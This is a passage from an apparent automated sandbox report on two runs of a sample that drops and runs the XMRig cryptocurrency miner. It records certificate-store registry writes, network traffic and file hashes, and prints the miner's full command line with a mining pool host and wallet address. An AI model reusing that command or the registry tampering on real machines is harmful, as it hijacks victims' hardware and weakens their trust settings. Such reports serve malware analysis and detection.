memory/528-56-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-57-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-58-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-59-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-60-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-61-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-62-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-63-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-64-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-65-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-66-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-67-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-68-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-69-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-70-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-71-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-72-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-73-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-74-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-75-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-76-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-77-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-78-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-79-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-80-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-81-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-82-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:47

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1796s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
BE 88.221.83.193:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 193.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4872-14-0x00000162BBEB0000-0x00000162BBED0000-memory.dmp

memory/4872-15-0x00000162BBEF0000-0x00000162BBF10000-memory.dmp

memory/4872-16-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-17-0x00000162BD7E0000-0x00000162BD800000-memory.dmp

memory/4872-18-0x00000162BD7C0000-0x00000162BD7E0000-memory.dmp

memory/4872-19-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-20-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-23-0x00000162BD7C0000-0x00000162BD7E0000-memory.dmp

memory/4872-22-0x00000162BD7E0000-0x00000162BD800000-memory.dmp

memory/4872-21-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-24-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-25-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-26-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-27-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-28-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-29-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-30-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-31-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-32-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-33-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-34-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-35-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-36-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-37-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-38-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-39-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-40-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-41-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-42-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-43-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-44-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-45-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-46-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-47-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-48-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-49-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-50-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-51-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-52-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-53-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-54-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-55-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-56-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-57-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-58-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-59-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-60-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-61-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-62-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-63-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-64-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-65-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-66-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-67-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-68-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-69-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-70-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-71-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-72-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-73-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-74-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-75-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-76-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-77-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-78-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-79-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-80-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-81-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-82-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240611-en

Max time kernel

1798s

Max time network

1787s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
